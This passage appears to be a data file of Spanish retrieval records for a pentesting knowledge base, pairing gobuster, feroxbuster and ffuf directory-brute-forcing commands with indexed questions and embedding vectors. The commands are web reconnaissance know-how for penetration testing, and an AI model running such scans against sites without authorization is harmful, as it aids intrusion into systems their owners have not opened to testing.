0.08228, 0.00479, 0.0271, -0.06523, -0.02794, -0.08016, -0.00868, 0.01434, 0.00848, -0.05531, -0.00348, 0.05524, 0.02318, 0.06619, -0.02334, -0.01224, -0.02771, 0.03967, -0.00806, 0.04349, -0.04225, -0.04744, 0.04997, -0.01944, 0.06395, 0.06241, 0.05145, -0.00595, -0.00697, 0.03748, -0.03574, -0.06416, -0.02809, -0.03215, 0.0242, 0.00565, -0.06156, 0.01634, -0.01998, -0.10827, 0.03992, 0.04073, 0.07374, -0.02055, 0.05781, 0.00997, -0.06813, -0.06004, -0.01828, 0.01823, -0.07999, 0.06114, 0.0194, -0.06388, 0.02801, 0.07543, 0.00665, -0.05491, -0.03598, 0.05177, -0.02902, -0.05766, 0.00406, 0.06488, 0.02794, -0.05767, 0.06092, -0.06965, -0.03035, -0.01376, -0.00182, 0.07621, -0.08294, -0.08879, -0.01688, -0.00923, -0.0712, -0.00918, 0.05676, -0.07016, -0.01562, -0.02667, 0.08091, 0.04921, -0.02702, 0.05419, -0.06624, -0.01894, -0.02334, 0.00287, -0.00159, -0.01501, -0.03645, 0.0535, -0.00163, 0.06772, 0.03003, 0.09647, -0.01406, 0.06961, 0.06931, -0.00568, -0.00954, -0.02323, -0.06683, -0.00374, -0.01691, 0.04211, -0.00763, -0.00153, -0.03581, -0.02799, -0.02167, -0.01507, 0.0674, 0.01947, -0.06082, 0.02181, -0.04648, -0.08649, 0.02264, -0.0312, -0.02979, -0.06626, 0.02846, 0.02741, -0.0809, 0.08093, -0.02003]} -{"tipo": "pregunta", "herramienta": "Content discovery", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Content discovery.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# gobuster (rΓ‘pido, directo)\ngobuster dir -u http://IP -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -x php,txt,html", "indexar": "con que puedo hacer un brute force rΓ‘pido contra un sitio web?", "v": [-0.00569, 0.05505, -0.2202, 0.00447, -0.08735, 0.02807, 0.02917, 0.02073, 0.02961, -0.11068, -0.05817, -0.01382, -0.0315, 0.07945, 0.00158, -0.03387, -0.01555, -0.04029, 0.00833, -0.13779, 0.05977, -0.2421, 0.0887, -0.13102, 0.02176, -0.08145, 0.00629, 0.17395, -0.16918, -0.08586, -0.04335, 0.09839, 0.11416, 0.05527, 0.04354, -0.02045, 0.02145, 0.07934, 0.11078, 0.07509, -0.07021, -0.0351, -0.13938, 0.033, -0.08879, 0.06492, -0.03115, -0.06403, 0.02009, 0.0138, -0.00958, -0.1313, -0.19426, -0.09643, -0.15961, -0.06002, 0.07216, -0.17573, -0.06243, -0.03735, -0.03589, 0.05993, -0.01969, -0.07516, -0.0927, 0.08214, 0.00701, 0.03709, -0.00613, -0.01958, -0.03558, -0.09093, 0.03388, -0.09547, -0.03915, -0.03302, -0.02565, 0.02032, -0.06493, 0.01347, -0.06284, 0.08642, -0.12583, 0.01215, -0.06546, -0.04799, -0.03082, -0.13455, 0.01104, -0.03022, 0.10015, 0.0707, -0.03945, -0.00478, -0.05026, -0.12484, 0.0061, 0.00339, 0.02184, -0.08164, -0.03487, -0.07709, -0.08956, -0.07412, 0.13758, -0.00728, -0.03535, 0.05888, -0.02286, 0.0389, 0.04516, -0.03718, -0.13413, 0.02307, -0.04899, 0.01764, -0.01467, -0.06647, -0.00775, 0.00076, -0.07859, -0.01059, -0.04344, 0.02092, -0.05124, 0.10119, 0.0494, 0.0316, -0.00325, -0.08752, 0.02875, -0.06196, 0.01796, -0.0769, 0.00686, 0.01117, 0.00586, -0.03581, 0.04676, -0.01282, 0.01643, -0.01529, -0.03682, 0.027, 0.0085, -0.07454, -0.0802, -0.02436, -0.09789, -0.00329, 0.00868, 0.01539, -0.02408, 0.03008, -0.0747, -0.01062, 0.02475, -0.05931, -0.03235, -0.02196, -0.01961, 0.07297, 0.02117, 0.04758, -0.01116, 0.04598, -0.11813, 0.04706, -0.00045, 0.01695, -0.02343, 0.04875, 0.04135, -0.03428, 0.04546, 0.04462, 0.01098, 0.03261, 0.03375, -0.065, 0.05455, 0.00044, -0.04223, 0.01925, -0.07998, 0.00242, 0.05626, 0.03391, -0.01647, 0.01865, -0.00148, 0.02165, -0.021, 0.0459, 0.03249, -0.0215, -0.05988, 0.06066, 0.01504, -0.0513, 0.03829, -0.11647, 0.04306, -0.00405, -0.02958, 0.03039, 0.03223, -0.04794, -0.03285, -0.02101, -0.00926, 0.02772, 0.04603, -0.07675, -0.06565, -0.01939, 0.02265, -0.02626, -0.03422, -0.01172, -0.01158, 0.07287, -0.04559, 0.03223, 0.02331, 0.05545, 0.04893, -0.0809, 0.0133, 0.03331, -0.04736, -0.10106, -0.018, -0.03665, -0.00214, -0.0001, 0.00389, 0.01077, -0.10299, 0.07911, 0.02127, -0.01017, 0.00289, 0.00493, -0.0249, -0.01843, -0.05478, -0.01988, -0.02707, -0.01962, -0.03514, -0.03337, 0.07786, -0.02214, -0.04333, 0.02124]} -{"tipo": "pregunta", "herramienta": "Content discovery", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Content discovery.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# feroxbuster (RECURSIVO automΓ‘tico, el favorito para OSCP)\nferoxbuster -u http://IP -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt -x php,txt,bak", "indexar": "que herramienta es mejor para hacer un reconocimiento rΓ‘pido de directorios web?", "v": [0.02821, 0.09901, -0.20582, -0.20733, 0.05168, -0.10026, -0.07848, 0.02275, -0.01417, -0.0229, 0.01312, -0.06115, -0.0521, -0.21452, 0.03109, 0.0164, 0.07127, -0.03869, -0.02392, -0.0043, 0.03072, 0.04489, -0.16219, -0.01777, -0.02968, -0.08556, -0.03935, 0.04458, -0.17846, 0.15379, 0.05863, 0.01676, -0.00572, -0.04486, -0.11884, -0.01287, 0.04794, 0.04438, 0.01183, 0.09248, -0.09214, 0.03194, -0.03459, 0.08565, 0.02656, -0.01412, 0.00324, -0.00365, 0.06037, 0.0127, 0.05787, -0.14838, -0.02439, -0.02199, -0.02006, -0.09516, 0.16918, -0.11845, 0.00373, -0.14569, -0.11238, -0.03644, -0.13428, -0.04279, -0.06481, -0.02693, 0.00736, -0.09639, -0.0858, 0.02688, -0.03498, 0.01823, 0.16233, 0.01355, 0.00667, 0.04461, 0.01069, 0.10518, 0.02357, -0.01698, 0.12507, -0.02746, -0.03609, -0.02851, -0.12018, -0.06758, -0.01938, -0.06987, 0.0831, -0.1153, -0.00363, 0.12285, -0.03897, 0.04086, 0.09862, -0.05766, 0.02405, -0.03768, -0.00378, 0.00047, 0.0775, -0.10738, -0.12623, 0.04733, 0.05848, 0.01904, -0.02, 0.0488, -0.15191, -0.00153, 0.10959, 0.01782, -0.02525, -7e-05, -0.03331, 0.10097, -0.01914, -0.10299, -0.00016, -0.06122, 0.01256, -0.00608, -0.0661, -0.05041, -0.01249, 0.00755, -0.01384, 0.06965, 0.0011, -0.07238, -0.05615, -0.10154, -0.13392, -0.01108, -0.01425, 0.05337, 0.0375, -0.07291, 0.05896, -0.08351, -0.01938, -0.02789, -0.08398, -0.04141, -0.00206, -0.02483, -0.01925, -0.01385, -0.06092, 0.03381, -0.00829, -0.03604, -0.00299, -0.08366, -0.03896, -0.0205, -0.01675, 0.02621, -0.04801, -0.0024, -0.04512, -0.05597, 0.07279, 0.04422, -0.00879, 0.01071, 0.05009, 0.1055, 0.0993, 0.02107, 0.07722, 0.06772, -0.00926, -0.07504, 0.03279, -0.03504, -0.00962, 0.01068, 0.05899, -0.01494, -0.00751, -0.0008, -0.02658, -0.04104, 0.00915, -0.03542, 0.06943, -0.01497, -0.03509, 0.06786, 0.02585, -0.00366, 0.06024, -0.0035, 0.05433, 0.00956, 0.0254, -0.04822, 0.0394, -0.00559, -0.04764, -0.08481, 0.00017, -0.05813, -0.02931, 0.02094, -0.00359, -0.05179, 0.00226, -0.0221, 0.02649, 0.03879, 0.05033, -0.01352, 0.01302, -0.00027, 0.00487, 0.06929, -0.03194, -0.05905, 0.01237, -0.05502, 0.01426, 0.00861, -0.01343, 0.01693, 0.00296, -0.04343, -0.00626, -0.02432, 0.00884, -0.06363, 0.00303, -0.08347, 0.0236, -0.02169, -0.02581, -0.06301, -0.04091, 0.08763, -0.01656, 0.01826, -0.00513, 0.03709, -0.06407, -0.00895, -0.02798, -0.05868, -0.0279, -0.04848, -0.0491, -0.05504, 0.05517, 0.00924, -0.01786, 0.0141]} -{"tipo": "pregunta", "herramienta": "Content discovery", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Content discovery.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# feroxbuster (RECURSIVO automΓ‘tico, el favorito para OSCP)\nferoxbuster -u http://IP -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt -x php,txt,bak", "indexar": "cual programa sirve para escanear rΓ‘pidamente una pΓ‘gina web buscando archivos ocultos?", "v": [0.06062, -0.00974, -0.12757, -0.11743, -0.0161, -0.24627, -0.01787, -0.1164, 0.02576, -0.02829, -0.08876, -0.16011, -0.03606, -0.07019, 0.00909, 0.00762, 0.16825, -0.05209, 0.17918, 0.05495, -0.02326, 0.05874, -0.01476, -0.07521, -0.14487, -0.12238, -0.00627, 0.06437, -0.103, -0.02134, -0.02891, 0.08499, 0.04233, 0.03149, -0.095, 0.06203, 0.10216, -0.0071, -0.01382, 0.03168, -0.01806, -0.01579, -0.13697, 0.04957, 0.01818, -0.00514, -0.00623, 0.05055, 0.01448, 0.0359, -0.05992, -0.00617, -0.11136, 0.08659, -0.01779, -0.09068, 0.01295, -0.12456, 0.037, -0.00258, -0.02119, 0.01469, 0.03956, -0.10716, -0.06224, 0.00541, 0.0261, 0.07251, -0.05942, 0.00242, -0.02583, 0.08565, 0.14826, -0.02368, -0.01612, -0.0309, -0.00205, -0.0348, 0.01402, -0.00418, 0.06212, 0.01548, -0.04662, 0.09102, -0.12739, -0.01365, -0.04513, 0.06519, -0.025, -0.05639, 0.06519, 0.04393, -0.03793, 0.05006, 0.01974, -0.11413, 0.16642, 0.03108, 0.04258, -0.01083, -0.04425, -0.07303, -0.12837, 0.10163, 0.02726, 0.11657, 0.00629, 0.03046, -0.10517, 0.07862, 0.08606, -0.00543, -0.06205, 0.0112, -0.08033, 0.0728, 0.02057, 0.01274, 0.0524, -0.07928, -0.08963, 0.02621, -0.1023, 0.03396, 0.05699, -5e-05, 0.04101, 0.0227, -0.04182, 0.05414, 0.01889, -0.0614, -0.09699, 0.0218, -0.06891, -0.08417, 0.07345, 0.0091, -0.01735, -0.03304, 0.11271, -0.07025, -0.05196, 0.0239, 0.05004, -0.00638, 0.10324, -0.02723, -0.01904, -0.06522, -0.0577, -0.00626, -0.01669, 0.0026, -0.05682, -0.01505, -0.01671, -0.04953, -0.10664, -0.04489, -0.07124, 0.0663, -0.0267, -0.01938, -0.0161, -0.05573, -0.04677, 0.04295, 0.02809, 0.01231, 0.05754, 0.06182, -0.02068, -0.1502, -0.00589, 0.08531, -0.01548, -0.0779, 0.0945, -0.01054, -0.02594, 0.01647, 0.0608, 0.08992, -0.02729, -0.06656, 0.09234, -0.04688, -0.07869, 0.00643, 0.07162, -0.07252, -0.1018, -0.00177, -0.06476, 0.00112, -0.04477, -0.00476, 0.08557, -0.12662, -0.03324, -0.04338, -0.00832, -0.00272, -0.03838, 0.00319, 0.03619, -0.111, 0.04257, 0.06099, -0.00446, -0.05167, 0.05886, -0.02021, 0.0221, -0.0399, 0.01891, -0.00058, 0.02073, -0.01155, 0.01031, -0.01255, 0.022, 0.05363, 0.02078, -0.0139, 0.025, -0.00812, -0.04592, -0.02867, -0.08345, -0.06601, -0.06434, 0.0047, 0.02363, -0.04486, -0.00853, 0.02952, -0.02939, -0.02457, -0.01889, 0.03905, -0.00106, -0.00328, 0.00774, -0.02833, -0.01029, -0.01804, 0.03678, 0.01249, -0.04781, 0.03115, -0.0122, -0.01636, 0.0637, 0.01936]} -{"tipo": "pregunta", "herramienta": "Content discovery", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Content discovery.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# feroxbuster (RECURSIVO automΓ‘tico, el favorito para OSCP)\nferoxbuster -u http://IP -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt -x php,txt,bak", "indexar": "con que puedo automatizar la detecciΓ³n recursiva de carpetas y archivos en un sitio web?", "v": [0.18988, -0.08067, -0.19144, -0.16251, 0.07772, -0.07438, 0.03558, 0.09172, -0.03591, 0.00398, -0.06724, -0.22983, -0.06311, 0.09323, 0.0829, 0.06064, 0.10145, 0.01981, 0.05156, -0.08058, 0.08442, -0.14666, 0.01259, 0.01707, -0.02431, 0.03661, 0.10031, 0.1188, -0.14668, -0.05402, -0.06636, 0.09261, 0.04567, 0.05726, -0.09142, -0.01713, 0.02218, 0.0676, -0.08007, -0.02706, 0.04733, 0.08964, -0.1071, 0.05655, -0.0319, -0.0195, -0.0169, -0.111, -0.06109, -0.0315, -0.06226, -0.12309, -0.14982, -0.00434, -0.07939, -0.05589, 0.08568, -0.0724, 0.17189, -0.08681, -0.06077, 0.07972, -0.07948, 0.0639, -0.06229, 0.01884, 0.06282, 0.01594, 0.01007, 0.06116, 0.04454, 0.03711, 0.13788, -0.02363, 0.07459, 0.0392, 0.00163, -0.03746, -0.00559, 0.05705, -0.03848, -0.0547, -0.03209, 0.04806, -0.0285, -0.07308, -0.01184, -0.06988, 0.02205, -0.11212, 0.03574, 0.00563, -0.03418, 0.04161, -0.01762, -0.05596, 0.07661, -0.06044, -0.04749, 0.00028, -0.06331, -0.02383, -0.07366, 0.1756, 0.11552, 0.10551, -0.03008, 0.07602, -0.01009, -0.17186, 0.08124, 0.03565, -0.00762, 0.0304, -0.14153, 0.03424, 0.00753, 0.02422, 0.00809, 0.02384, 0.01057, -0.02314, -0.00373, -0.04626, 0.06153, -0.04653, 0.05797, 0.13531, -0.09803, -0.04507, 0.02007, 0.08652, -0.10583, -0.01819, -0.00019, 0.06105, 0.01394, 0.01717, 0.01725, -0.03089, 0.05673, -0.0031, 0.03246, -0.00089, 0.0767, -0.00955, 0.00171, -0.02516, -0.0427, -0.06199, -0.04843, 0.02251, -0.00449, -0.0726, -0.02727, 0.07672, 0.03017, -0.01722, -0.00072, -0.02536, -0.08263, 0.00916, 0.00448, 0.07548, 0.02421, 0.05929, -0.05321, 0.02055, 0.03514, 0.01466, 0.02486, 0.02419, -0.04578, -0.08351, -0.04393, 0.08443, -0.01199, -0.02789, 0.04864, -0.04563, 0.0139, -0.05525, -0.0355, -0.03597, -0.02448, 0.0102, 0.08642, 0.01482, 0.0115, 0.06705, 0.01226, 0.01405, -0.07405, 0.05557, -0.02163, 0.00335, -0.02677, 0.05481, 0.05677, -0.03535, -0.03517, -0.01386, -0.02622, 0.01008, 0.00962, 0.06519, -0.02176, -0.0455, 0.01048, -0.02409, 0.00149, -0.01257, 0.06743, -0.0742, -0.06945, -0.02512, 0.00601, -0.02383, -0.04887, -0.02607, 0.10168, -0.00898, 0.02674, 0.06667, 0.02892, -0.00313, 0.02314, 0.01498, 0.04731, -0.05199, -0.02516, 0.01291, -0.01251, -0.02697, -0.01135, -0.01871, 0.00336, -0.04521, -0.05262, 0.00316, -0.02342, 0.02449, -0.02573, -0.0185, 0.00811, -0.0619, -0.07589, -0.02743, -0.01003, -0.02895, -0.0338, -0.01118, -0.00625, -0.02004, 0.01707, -0.00187]} -{"tipo": "pregunta", "herramienta": "Content discovery", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Content discovery.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# ffuf (el mΓ‘s flexible: filtros, vhosts, params)\nffuf -u http://IP/FUZZ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -e .php,.txt\n```", "indexar": "ΒΏcon quΓ© herramienta puedo hacer un anΓ‘lisis rΓ‘pido de directorios en una web?", "v": [-0.0748, 0.14961, -0.05606, -0.09981, 0.01454, -0.09955, -0.05274, -0.00843, -0.10439, -0.02507, -0.04633, -0.10797, -0.05122, -0.14538, 0.06421, 0.05261, 0.1176, -0.06119, 0.02509, -0.07063, -0.02317, -0.07551, -0.21788, -0.02128, -0.06808, -0.05753, 0.01051, 0.03991, -0.20627, 0.07006, -0.06099, 0.03569, 0.08836, -0.00231, -0.16622, 0.02945, 0.06169, 0.11252, 0.05365, 0.12606, -0.05924, -0.01105, -0.09331, 0.01513, 0.02313, -0.04049, -0.01646, -0.07015, 0.00645, 0.04585, 0.03002, -0.18759, -0.05988, -0.02173, -0.03635, -0.14755, 0.20794, -0.16937, 0.11449, -0.12164, -0.06174, 0.02512, -0.04787, 0.00364, -0.07717, -0.03583, -0.03616, -0.05177, -0.06815, 0.09425, -0.03299, 0.02182, 0.07335, 0.03454, -0.00506, 0.02461, 0.0008, 0.08199, -0.00395, 0.00791, 0.0899, 0.01666, -0.02405, 0.00839, -0.12555, -0.08198, -0.02322, -0.04978, 0.0529, -0.12579, 0.00271, 0.07893, -0.03999, 0.02875, 0.02288, -0.03507, 0.01444, -0.05818, -0.02461, -0.00803, 0.07127, -0.09054, -0.14401, 0.05077, 0.03018, 0.06014, -0.04322, 0.05311, -0.18735, 0.01387, 0.07104, 0.01849, -0.03199, -0.07046, -0.01498, 0.07569, -0.02682, -0.01207, -0.03713, -0.0646, 0.03725, 0.07712, -0.08188, -0.02679, -0.06704, 0.01431, 0.04223, 0.09764, -0.02004, -0.06359, 0.03539, -0.06721, -0.13093, -0.06683, -0.006, 0.03309, 0.0085, -0.1, 0.00676, -0.10055, 0.00798, -0.02773, -0.06894, -0.0075, 0.00922, -0.03643, -0.00835, -0.05285, -0.09361, -0.01984, 0.02491, -0.03338, -0.04363, -0.0366, -0.00527, -0.05685, -0.00799, -0.01515, -0.08841, -0.00879, -0.02372, -0.06503, 0.08605, 0.01803, 0.02051, -0.02451, 0.02167, 0.03365, 0.04217, 0.04565, 0.01855, 0.03013, 0.04015, -0.07909, 0.0683, -0.03395, -0.0136, -0.02338, 0.00794, -0.06558, 0.01282, -0.01696, -0.04077, -0.02354, -0.01051, -0.01642, 0.07532, -0.04725, -0.01852, 0.06242, 0.02483, 0.01851, 0.04252, -0.03639, 0.08225, 0.02228, 0.0533, -0.04479, 0.01224, -0.00629, -0.04267, -0.07614, 0.01945, -0.02112, -0.03229, 0.04641, -0.04281, -0.00666, -0.01018, -0.02919, 0.00383, 0.0681, 0.09255, -0.02979, 0.00212, 0.00157, 0.00067, 0.05308, -0.04004, -0.03018, 0.01491, -0.01151, 0.01988, 0.02952, 0.00733, 0.05187, -0.00892, -0.05546, 0.00845, 0.01696, 0.03437, -0.04344, 0.01053, -0.02346, 0.02792, -0.06363, -0.02932, -0.00894, -0.04521, 0.09414, 0.00136, 0.04212, 0.00867, 0.02945, -0.03195, -0.01536, -0.02657, -0.03103, -0.06627, -0.0604, -0.06123, -0.02604, 0.04555, -0.0195, 0.01862, 0.03]} -{"tipo": "pregunta", "herramienta": "Content discovery", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Content discovery.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# ffuf (el mΓ‘s flexible: filtros, vhosts, params)\nffuf -u http://IP/FUZZ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -e .php,.txt\n```", "indexar": "quΓ© programa sirve para filtrar y probar diferentes archivos de forma flexible?", "v": [0.08187, 0.00349, -0.18999, -0.17051, 0.02872, -0.11418, 0.07098, -0.04485, -0.07588, -0.18959, 0.027, -0.04707, 0.04829, -0.09806, 0.01289, -0.03894, 0.05735, -0.21702, 0.0104, 0.01659, -0.03679, -0.01759, -0.14745, -0.2055, -0.10322, -0.04089, 0.05398, 0.01006, -0.08304, 0.00359, 0.02485, 0.07349, 0.17906, -0.06299, -0.05347, 0.09307, 0.04512, -0.03899, -0.07076, 0.03648, 0.04835, 0.00617, -0.00366, 0.08577, -0.03804, 0.03232, -0.04858, -0.00393, -0.00017, 0.07965, -0.00798, -0.00822, 0.05243, 0.125, -0.0293, -0.06834, -0.07976, -0.20831, -0.03782, 0.04315, -0.02567, -0.01134, 0.07559, -0.02997, 0.01044, -0.03772, -0.00839, 0.01861, -0.12928, 0.0203, -0.04481, 0.0137, 0.05196, 0.01157, -0.10725, 0.07444, 0.02656, -0.04546, 0.05875, -0.08258, 0.05248, 0.0213, -0.0204, 0.02704, -0.04459, -0.02109, 0.07317, -0.0012, -0.07476, -0.00937, 0.03976, 0.02326, 0.02809, 0.10081, 0.03497, -0.02315, 0.15751, 0.07472, 0.00915, -0.01364, 0.04582, -0.07651, -0.07874, 0.13997, -0.0575, 0.06538, 0.031, 0.01915, -0.05312, -0.00501, -0.00166, 0.00709, -0.02768, 0.01037, -0.0527, -0.03095, -0.00557, -0.04777, 0.01949, -0.01107, -0.01884, 0.03872, -0.08468, 0.00958, 0.11693, 0.05094, 0.061, 0.08523, -0.06652, 0.11915, 0.03887, 0.12209, -0.09005, -0.01823, -0.0471, -0.08038, 0.08998, -0.01063, -0.05157, -0.08894, 0.05236, 0.0791, 0.062, 0.04892, 0.05346, -0.05567, 0.09201, -0.02293, -0.06839, 0.00494, -0.0539, -0.04909, 0.00152, 0.00207, -0.10703, -0.00929, 0.01526, -0.13123, -0.1311, 0.0645, -0.09845, 0.05478, -0.03448, 0.01867, 0.0892, -0.02689, 0.00796, -0.02196, 0.08222, 0.01361, 0.04727, 0.09461, 0.00563, -0.0448, -0.01002, 0.0406, -0.04659, -0.06205, 0.04176, -0.03626, -0.03134, 0.07582, 0.03011, 0.00037, -0.00479, -0.03547, -0.05399, 0.01683, 0.00422, 0.03804, 0.03201, 0.05057, -0.05971, -0.01068, -0.00725, -0.02778, -0.01249, -0.03168, 0.01195, -0.00041, -0.05557, -0.01603, -0.01755, -0.01875, 0.02366, 0.0782, -0.02965, 0.0075, 0.05832, 0.05809, 0.02679, -0.00538, 0.09683, 0.00349, -0.01843, -0.00149, 0.00243, 0.03855, 0.10253, 0.07435, 0.01445, -0.00638, 0.06215, 0.04076, -0.01927, -0.00517, 0.02104, -0.00861, 0.00973, -0.03225, 0.01486, -0.00927, -0.04262, -0.02168, -0.00643, -0.00328, 0.00491, -0.00569, -0.02241, -0.1258, -0.01511, 0.06425, -0.02698, -0.00983, -0.00377, -0.04014, -0.05319, 0.01546, 0.02162, -0.01663, -0.07878, 0.0294, 0.03637, -0.00904, 0.0558, 0.01175]} -{"tipo": "pregunta", "herramienta": "Content discovery", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Content discovery.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# ffuf (el mΓ‘s flexible: filtros, vhosts, params)\nffuf -u http://IP/FUZZ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -e .php,.txt\n```", "indexar": "ΒΏcual es la alternativa mΓ‘s potente para el escaneo de vhosts y parΓ‘metros?", "v": [-0.1694, -0.15531, -0.18206, -0.03975, -0.03373, -0.00689, -0.00381, -0.21975, -0.13757, -0.02537, -0.06964, 0.05191, -0.00524, 0.0108, -0.02974, 0.08356, 0.00695, -0.03017, 0.05163, 0.12962, -0.10193, -0.08882, -0.15861, -0.00284, -0.08158, 0.02818, -0.0282, 0.15045, -0.12019, -0.08262, 0.01722, 0.04707, -0.06905, -0.06062, -0.01533, 0.0262, 0.04129, 0.02786, 0.10123, 0.10236, -0.00442, -0.04538, 0.03746, -0.08472, -0.01674, -0.03334, -0.20107, 0.05417, 0.04698, -0.06567, -0.16939, -0.08604, -0.0974, 0.09754, 0.12922, -0.08195, 0.07148, -0.08353, -0.00296, -0.19625, -0.00518, 0.0889, 0.04523, -0.05206, -0.0205, -0.03526, -0.04059, -0.04005, -0.11138, 0.07666, -0.08012, 0.05593, 0.00695, -0.026, 0.02375, 0.03755, 0.02058, -0.00558, 0.06593, -0.03492, 0.00023, 0.02848, -0.042, 0.05653, -0.07898, 0.06332, 0.00691, -0.15366, 0.00588, 0.03099, 0.05551, -0.03608, 0.08496, 0.0751, 0.03675, -0.01697, 0.06993, 0.09658, 0.02837, 0.00501, 0.02013, 0.04004, -0.0448, 0.15197, 0.13782, -0.07022, -0.06771, 0.05602, -0.10336, 0.02991, -0.03918, 0.07135, 0.01429, 0.00151, 0.03294, -0.07408, -0.03794, -0.06741, -0.05094, -0.0095, -0.06699, 0.056, -0.06719, 0.02087, 0.03216, 0.0614, 0.03046, -0.05076, 0.08663, 0.01777, 0.02257, -0.07146, 0.03128, -0.03679, -0.0777, -0.02749, 0.02687, -0.03515, 0.05255, -0.03064, -0.06629, 0.02458, -0.0037, 0.00754, 0.00621, -0.00777, 0.01229, 0.01416, -0.01149, 0.01646, 0.01173, 0.01907, -0.04352, 0.05531, -0.12557, 0.00168, 0.01383, 0.00549, -0.11565, 0.06381, 0.00961, -0.10705, -0.00321, 0.02611, -0.04617, 0.00166, -0.04924, -0.01621, -0.14961, 0.06705, 0.01843, 0.08911, 0.01834, -0.01935, 0.03912, 0.02573, 0.01901, -0.08885, 0.0131, 0.02766, 0.03641, 0.01846, -0.06898, 0.04033, 0.09669, 0.03584, 0.05067, -0.00261, -0.07423, -0.02728, -0.01678, 0.02002, -0.01336, -0.06202, -0.05704, 0.01786, -0.03206, -0.09287, -0.04569, 0.02927, -0.06561, 0.00764, -0.02152, 0.00651, 0.0183, -0.02499, -0.04467, -0.02275, 0.03149, -0.0208, -0.00522, 0.02894, 0.02199, 0.0166, -0.00947, 0.01214, 0.03715, -0.00579, 0.01998, 0.00737, -0.07262, 0.0156, 0.04658, 0.00524, 0.02256, -0.00241, 0.00247, 0.01271, 0.00509, -0.01059, 0.07821, -0.0395, 0.02914, 0.058, -0.01956, -0.03541, 0.04291, 0.05524, 0.02611, 0.01162, -0.02469, -0.02611, -0.00681, 0.05155, -0.03735, 0.01965, -0.0085, -0.01005, -0.03922, 0.03335, -0.01614, 0.02327, 0.02187, -0.05361, 0.04862, 0.03885]} -{"tipo": "pregunta", "herramienta": "Content discovery", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Content discovery.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Lo que importa\n- **Extensiones** (`-x` / `-e`): prueba segΓΊn la tecnologΓ­a β†’ `php`, `asp`, `aspx`, `txt`, `bak`, `zip`, `old`.\n- **RecursiΓ³n**: feroxbuster baja solo a las carpetas que encuentra (gobuster no).\n- **Wordlists**: `raft-large-words`, `directory-list-2.3-medium`. `common.txt` es nivel junior (Trampas de enumeraciΓ³n).\n- **Filtrar ruido** en ffuf: `-fc 404` (cΓ³digo), `-fs 1234` (tamaΓ±o), `-mc 200,301,302`.", "indexar": "con que herramienta puedo hacer un ataque vertical de directorios recursivo?", "v": [-0.01931, 0.01064, -0.27582, -0.20906, 0.02795, 0.0022, -0.01337, 0.01471, 0.06759, -0.02608, 0.11935, -0.20838, -0.03688, -0.08707, 0.10221, 0.00319, 0.05996, -0.02181, 0.00328, -0.03762, 0.02789, -0.05423, -0.07418, 0.03614, -0.03703, 0.07202, -0.04774, 0.08036, -0.15617, -0.11399, -0.01292, -0.00119, 0.01851, -0.06786, -0.09698, -0.06537, -0.01493, 0.0774, -0.00314, 0.12167, -0.0492, 0.03299, -0.20352, -0.00189, -0.00191, -0.10184, 0.06071, 0.00369, 0.02733, 0.06315, 0.03099, -0.1323, -0.16943, -0.00925, -0.04003, -0.07641, 0.18702, -0.13271, 0.07994, -0.1568, -0.10727, 0.00634, -0.02442, -0.02292, 0.0055, -0.00994, 0.00383, -0.11047, -0.04004, 0.05052, -0.03912, 0.03638, 0.07298, 0.03498, 0.00017, 0.03043, 0.05483, 0.07959, -0.01337, 0.06426, -0.08406, -0.04769, -0.05126, -0.03682, -0.14105, -0.08904, -0.00288, -0.07201, 0.03307, -0.13206, -0.01083, 0.02301, -0.08864, -0.02866, -0.03024, -0.0204, -0.02713, -0.0661, -0.03605, -0.01689, 0.02974, -0.0993, -0.1083, 0.12549, 0.07607, 0.00598, -0.1166, 0.0507, -0.12273, -0.00811, 0.05556, 0.00396, -0.00374, -0.05852, -0.00644, 0.03369, -0.1499, 0.00111, 0.01979, 0.05271, 0.05323, 0.01156, -0.03144, 0.0328, -0.00838, -0.02981, 0.01041, 0.04984, -0.06604, -0.04133, 0.01635, 0.0014, -7e-05, -0.02112, -0.03193, 0.01873, 0.08455, -0.10159, 0.02284, -0.05345, 0.04137, 0.04675, -0.01332, -0.06756, -0.02105, -0.01464, -0.03131, -0.01938, -0.07141, -0.01197, 0.03108, 0.00195, -0.04089, 0.01492, -0.00891, -0.03383, 0.0158, 0.03388, -0.06082, 0.10006, -0.07446, -0.02356, 0.00661, 0.09763, -0.00646, -0.03779, 0.02669, -0.03704, 0.07048, 0.04878, -0.01356, -0.01536, 0.05621, -0.02105, -0.01975, -0.06365, -0.05033, 0.02642, 0.02004, -0.00918, 0.03749, -0.06022, -0.09368, -0.03265, 0.02196, -0.05922, 0.07903, 0.04211, 0.06591, 0.04153, -0.06109, 0.03996, 0.01348, -0.07802, 0.07445, -0.01107, -0.00545, 0.01379, 0.02519, 0.04632, -0.00218, -0.00248, -0.00799, -0.01557, 0.06975, 0.07964, -0.03868, 0.0073, 0.02564, 0.02079, 0.03182, 0.02845, 0.07814, 0.00685, -0.05496, 0.02991, -0.02031, 0.02048, -0.04313, -0.01233, 0.03844, -0.06236, 0.01798, 0.06076, -0.00606, -0.03105, -0.02465, -0.032, -0.03374, -0.01646, -0.00697, -0.05818, 0.05583, -0.02913, 0.01092, -0.05563, 0.0067, 0.01583, 